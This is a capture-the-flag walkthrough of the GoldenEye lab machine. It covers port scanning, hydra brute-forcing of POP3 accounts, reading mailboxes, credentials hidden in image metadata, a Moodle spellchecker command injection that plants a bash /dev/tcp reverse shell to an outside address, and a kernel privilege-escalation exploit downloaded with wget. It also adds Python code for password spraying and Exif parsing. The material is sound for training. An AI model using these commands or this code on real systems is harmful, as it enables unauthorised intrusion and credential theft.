
GoldenEye

1. Initial Port Scan and Service Discovery

export TARGET_IP=10.10.206.199
sudo nmap -p- $TARGET_IP

Output:

Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown

Service detection on the two unknown high ports:

nmap -sV -p 55006,55007 $TARGET_IP

Output:

PORT      STATE SERVICE  VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
55007/tcp open pop3 Dovecot pop3d

POP3 (Post Office Protocol version 3) retrieves mail from a mailbox on the server. Dovecot is serving it twice here: 55007 is plaintext POP3, which netcat can talk to directly, while 55006 is POP3 wrapped in TLS (POP3S) and would need something like openssl s_client -connect $TARGET_IP:55006 instead. Everything below uses the plaintext port. SMTP on 25 is not needed for this box.

2. Web Application Reconnaissance and Credential Discovery

With port 80 (HTTP) open, we investigate the web application. Browsing to http://10.10.206.199 reveals a web page. Upon inspecting the source code of the homepage, we find a JavaScript file terminal.js linked at http://10.10.206.199/terminal.js. Viewing this file reveals interesting comments:

  • A comment mentions a user "Boris" and a password for him.
  • The password is written as HTML character entities (a run of &#NN; sequences) so it does not read as plain text in the source; decoded it is InvincibleHack3r.
  • Another user, "Natalya", is also mentioned, giving a second candidate username.

We decode the entity-encoded string with Python's html module, passing the encoded text copied from terminal.js as the argument (html.unescape on the already-decoded string would just return it unchanged):

python3 -c "import html, sys; print(html.unescape(sys.argv[1]))" '<encoded string from terminal.js>'

The decoded password for user "Boris" is InvincibleHack3r.

3. POP3 Service Exploitation

Given the open POP3 ports and the discovered username "boris", we connect to the plaintext POP3 service on port 55007 and try the credentials. netcat (nc) is enough for manual interaction, since POP3 is a line-based text protocol.

nc $TARGET_IP 55007

After connecting with netcat, we manually interact with the POP3 server:

> +OK GoldenEye POP3 Electronic-Mail System
USER boris
> +OK
PASS InvincibleHack3r
> -ERR [AUTH] Authentication failed.

Analysis:

The POP3 server rejects InvincibleHack3r for "boris". The password came from a comment in the web terminal's JavaScript, so it may be stale or belong to the web terminal rather than the mailbox; either way the POP3 account needs its own password.

Since the initial password failed, we proceed with password brute-forcing for the user "boris" using hydra.

hydra -l boris -P /usr/share/wordlists/fasttrack.txt $TARGET_IP -s 55007 pop3
[55007][pop3] host: 10.10.206.199   login: boris   password: secret1!

4. Accessing Boris' Emails via POP3

With the valid credentials boris:secret1!, we connect to the POP3 server again using netcat and retrieve Boris' emails.

nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER boris
> +OK
PASS secret1!
> +OK Logged in.
LIST
> +OK 3 messages:
> 1 544
> 2 373
> 3 921
RETR 1
RETR 2
RETR 3

Email Content (Retrieved using RETR commands):

Message 3:

From: alec@janus.boss
Boris,
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
  • Usernames: root, natalya, alec, and xenia are mentioned as users within the system.
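The POP3 exchange from sections 3 and 4 (and the identical logins for natalya and doak later) as a runnable added example; this is not code from the original walkthrough. It stands up a tiny fake POP3 server on localhost with a constructed mailbox (the recovered password secret1! and two made-up messages, the second containing a line that starts with "." to exercise POP3 byte-stuffing), then does what hydra and the nc session do: one connection per candidate password until PASS is accepted, then LIST and RETR for every message, with poplib removing the stuffed dots. Host, port, wordlist and message bodies are all constructed for the demo.

```python
import poplib
import socketserver
import threading

# Constructed demo mailbox: one user, the password the walkthrough recovered, two made-up messages.
# Message 2 deliberately starts a line with "." to exercise RFC 1939 byte-stuffing.
MAILBOX = {"boris": ("secret1!", [
    "From: demo@example.invalid\r\nSubject: constructed message one\r\n\r\nBoris, first demo body.",
    "From: demo@example.invalid\r\nSubject: constructed message two\r\n\r\n.hidden line starts with a dot\r\nend",
])}


class FakePop3Handler(socketserver.StreamRequestHandler):
    """Minimal POP3 server (USER/PASS/LIST/RETR/QUIT), just enough to stand in for Dovecot offline."""

    def handle(self):
        self.wfile.write(b"+OK GoldenEye POP3 Electronic-Mail System\r\n")
        user, authed = None, False
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"+OK\r\n")
            elif cmd == "PASS":
                entry = MAILBOX.get(user)
                authed = bool(entry) and entry[0] == arg
                self.wfile.write(b"+OK Logged in.\r\n" if authed else b"-ERR [AUTH] Authentication failed.\r\n")
            elif cmd == "LIST" and authed:
                msgs = MAILBOX[user][1]
                self.wfile.write(f"+OK {len(msgs)} messages:\r\n".encode())
                for i, m in enumerate(msgs, 1):
                    self.wfile.write(f"{i} {len(m)}\r\n".encode())
                self.wfile.write(b".\r\n")
            elif cmd == "RETR" and authed:
                msgs = MAILBOX[user][1]
                idx = int(arg) if arg.isdigit() else 0
                if not 1 <= idx <= len(msgs):
                    self.wfile.write(b"-ERR no such message\r\n")
                    continue
                body = msgs[idx - 1]
                self.wfile.write(f"+OK {len(body)} octets\r\n".encode())
                for text in body.split("\r\n"):
                    # Byte-stuffing: a body line beginning with "." is sent with an extra "." in front
                    self.wfile.write((("." if text.startswith(".") else "") + text + "\r\n").encode())
                self.wfile.write(b".\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"+OK Bye\r\n")
                return
            else:
                self.wfile.write(b"-ERR unknown command or not authenticated\r\n")


def start_fake_pop3():
    """Bind the fake server on an ephemeral localhost port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePop3Handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def pop3_spray(host, port, user, candidates):
    """What hydra does for one user: a fresh connection per candidate, stop at the first +OK to PASS."""
    for password in candidates:
        conn = poplib.POP3(host, port, timeout=5)
        try:
            conn.user(user)
            conn.pass_(password)  # raises poplib.error_proto on a "-ERR ..." reply
            return password
        except poplib.error_proto:
            continue
        finally:
            try:
                conn.quit()
            except (poplib.error_proto, OSError):
                pass
    return None


def pop3_fetch_all(host, port, user, password):
    """The USER/PASS/LIST/RETR sequence typed into nc above, returning each message as text."""
    conn = poplib.POP3(host, port, timeout=5)
    try:
        conn.user(user)
        conn.pass_(password)
        _, listing, _ = conn.list()  # entries look like b"1 544": message number, size in octets
        messages = []
        for entry in listing:
            _, lines, _ = conn.retr(int(entry.split()[0]))  # poplib strips the stuffed dots
            messages.append(b"\r\n".join(lines).decode())
        return messages
    finally:
        conn.quit()
```

Against the real target, pop3_spray("10.10.206.199", 55007, "boris", wordlist) is the equivalent of the hydra line; it is sequential and so slower than hydra's parallel tasks, but easier to reason about when a server starts dropping connections. pop3_fetch_all with the recovered password returns the same messages the RETR commands show.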

5. Brute-forcing Natalya's POP3 Password

Based on the emails and the comment in terminal.js, "Natalya" is another likely user. We brute-force her POP3 password with hydra, this time with 64 parallel tasks (-t 64) to speed up the run. If Dovecot starts refusing or dropping connections at that rate, lower the task count rather than trusting a clean run that found nothing.

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -t 64 pop3://$TARGET_IP:55007
[55007][pop3] host: 10.10.206.199   login: natalya   password: bird

6. Accessing Natalya's Emails via POP3

Using the credentials natalya:bird, we access Natalya's emails via POP3.

nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER natalya
> +OK
PASS bird
> +OK Logged in.
LIST
> +OK 2 messages:
> 1 631
> 2 1048
RETR 1
RETR 2

Analysis:

Natalya's emails provide more valuable information:

  • "GNO supervisor for training": Confirms the existence of a training site.
  • "severnaya-station.com/gnocertdir": Reveals the URL for the training site.
  • "xenia:RCP90rulez!": Provides credentials for a new user, "xenia", for the training site.
  • /etc/hosts modification: Instructions to add an entry to the local /etc/hosts file so that severnaya-station.com resolves to the target IP. This is needed because the name is internal and not in public DNS; the web server expects that Host header to serve the training site.

7. Host File Modification and Accessing the Training Site

Following the instructions in Natalya's email, we modify the /etc/hosts file to map severnaya-station.com to the target IP address.

echo "$TARGET_IP   severnaya-station.com" | sudo tee -a /etc/hosts

After modifying the /etc/hosts file, we can access the training site at http://severnaya-station.com/gnocertdir/.

We log in to http://severnaya-station.com/gnocertdir/ using the credentials xenia:RCP90rulez!.

8. Exploring the Training Site and Discovering Doak's Credentials

Within the training site, specifically in http://severnaya-station.com/gnocertdir/message/index.php?viewing=unread&user2=5, we find messages that reveal another username: doak.

We then attempt to brute-force Doak's POP3 password.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -t 64 pop3://$TARGET_IP:55007
[55007][pop3] host: 10.10.206.199   login: doak   password: goat

9. Accessing Doak's Emails via POP3 and Discovering Dr_Doak's Credentials

We access Doak's emails using the credentials doak:goat.

nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER doak
> +OK
PASS goat
> +OK Logged in.
LIST
> +OK 1 messages:
> 1 606
RETR 1

Analysis:

Doak's email provides credentials for another user, dr_doak, for the training site: dr_doak:4England!.

10. Logging into Dr_Doak's Training Site Account and Finding Sensitive File

We log in to the training site at http://severnaya-station.com/gnocertdir/login/index.php using the credentials dr_doak:4England!. Within Dr_Doak's account, we navigate to the "private file" section (presumably http://severnaya-station.com/gnocertdir/user/files.php) and download the file s3cret.txt.

cat s3cret.txt

Analysis:

  • s3cret.txt says the application's admin credentials were captured and points at /dir007key/for-007.jpg, a file on the web server worth retrieving.

11. Analyzing for-007.jpg Metadata for Admin Credentials

We access http://severnaya-station.com/dir007key/for-007.jpg and download the image file. We then use exiftool to analyze its metadata for hidden information.

exiftool for-007.jpg
Image Description               : eFdpbnRlcjE5OTV4IQ==

The Image Description metadata field contains a Base64 encoded string: eFdpbnRlcjE5OTV4IQ==. We decode this string using base64.

echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d

Output:

xWinter1995x!

Analysis:

The decoded string is xWinter1995x!. This is likely the administrator password mentioned in s3cret.txt.
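To show what exiftool is actually reading, here is an added example (not from the original page) that builds a constructed stand-in for for-007.jpg containing a single Exif Image Description tag, parses the JPEG marker segments and the TIFF directory inside the APP1 segment by hand to pull that tag back out, and base64-decodes it. The sample bytes come from build_sample_jpeg; the real image carries more segments and tags, but the APP1/IFD0 layout is the same, and the parser handles both little-endian ("II") and big-endian ("MM") TIFF headers.

```python
import base64
import struct

TAG_IMAGE_DESCRIPTION = 0x010E  # TIFF/Exif tag exiftool reports as "Image Description"
TYPE_ASCII = 2


def build_sample_jpeg(description, byte_order="<"):
    """Constructed stand-in for for-007.jpg: SOI, one APP1/Exif segment with a single IFD0 entry, EOI."""
    value = description.encode("ascii") + b"\x00"  # ASCII tag values are NUL-terminated
    ifd_offset = 8                                  # IFD0 directly after the 8-byte TIFF header
    value_offset = ifd_offset + 2 + 12 + 4          # count + one 12-byte entry + next-IFD pointer
    tiff = (b"II" if byte_order == "<" else b"MM") + struct.pack(byte_order + "HI", 42, ifd_offset)
    tiff += struct.pack(byte_order + "H", 1)
    tiff += struct.pack(byte_order + "HHI", TAG_IMAGE_DESCRIPTION, TYPE_ASCII, len(value))
    if len(value) <= 4:
        # TIFF rule: values of 4 bytes or fewer are stored inside the entry, not pointed to
        tiff += value.ljust(4, b"\x00") + struct.pack(byte_order + "I", 0)
    else:
        tiff += struct.pack(byte_order + "I", value_offset) + struct.pack(byte_order + "I", 0) + value
    payload = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"


def _image_description_from_tiff(tiff):
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None:
        raise ValueError("unknown TIFF byte order")
    magic, ifd_offset = struct.unpack(order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(order + "H", tiff[ifd_offset:ifd_offset + 2])
    for i in range(count):
        at = ifd_offset + 2 + 12 * i
        tag, typ, n, value_or_offset = struct.unpack(order + "HHII", tiff[at:at + 12])
        if tag != TAG_IMAGE_DESCRIPTION or typ != TYPE_ASCII:
            continue
        raw = tiff[at + 8:at + 8 + n] if n <= 4 else tiff[value_or_offset:value_or_offset + n]
        return raw.rstrip(b"\x00").decode("ascii", errors="replace")
    return None


def exif_image_description(jpeg):
    """Walk JPEG marker segments up to SOS, parse the Exif APP1 segment, return tag 0x010E or None."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or start of scan: no more metadata segments follow
            break
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])  # length includes its own 2 bytes
        segment = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return _image_description_from_tiff(segment[6:])
        pos += 2 + length
    return None


def decode_hidden_description(jpeg):
    """The exiftool + base64 -d step in one go: None if there is no description, else the decoded text."""
    description = exif_image_description(jpeg)
    if description is None:
        return None
    return base64.b64decode(description, validate=True).decode("utf-8", errors="replace")


if __name__ == "__main__":
    sample = build_sample_jpeg("eFdpbnRlcjE5OTV4IQ==")
    print("Image Description:", exif_image_description(sample))
    print("decoded:", decode_hidden_description(sample))
```

Reading the downloaded file with open("for-007.jpg", "rb").read() and passing it to decode_hidden_description gives the same result as the exiftool and base64 -d commands above; the hand-written parser is only there to make visible where in the file the string lives.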

12. Admin Login and Reverse Shell via the Spellchecker

We now have candidate administrator credentials, admin:xWinter1995x!, and log in to the training site as "admin". The /gnocertdir/login/index.php and message/index.php URLs are Moodle's, and searching the site administration for "spell" brings up the text editor's spellchecker settings.

With the PSpellShell engine selected, Moodle runs the configured "Path to aspell" through a shell whenever a spellcheck is requested, so the setting can hold an arbitrary command (this is the Moodle spellchecker command injection, CVE-2013-3630). Start a listener first, then change the settings:

  • Spell engine > PSpellShell
  • Path to aspell > bash -c 'exec bash -i &>/dev/tcp/10.2.17.44/6666 <&1'
    • (replace 10.2.17.44 with your own VPN address; 6666 is the listener port)

nc -lvnp 6666

Trigger it by going to Site pages > Site blogs > Add a new entry and pressing the last button, Toggle spellchecker, in the Blog entry body editor toolbar. The shell arrives at the listener as the web server user:

id # uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a

13. Privilege Escalation via overlayfs

The kernel version reported by uname -a falls in the range covered by the overlayfs local privilege escalation (CVE-2015-1328, Ubuntu kernels 3.13.0 up to 3.19): https://www.exploit-db.com/exploits/37292. Download it to the attacking host.

gcc is not installed on the target, but cc is. Replacing the compiler is not only a matter of how we build the exploit: 37292.c also shells out to gcc at runtime to compile its helper shared object, so edit the source and replace gcc with cc there before uploading it.

python3 -m http.server 8000            # attacking host, in the directory holding the edited 37292.c
cd /tmp                                # target, in the reverse shell
wget http://10.2.17.44:8000/37292.c    # fetch the exploit source
cc 37292.c -o exploit
./exploit
id # uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/.flag.txt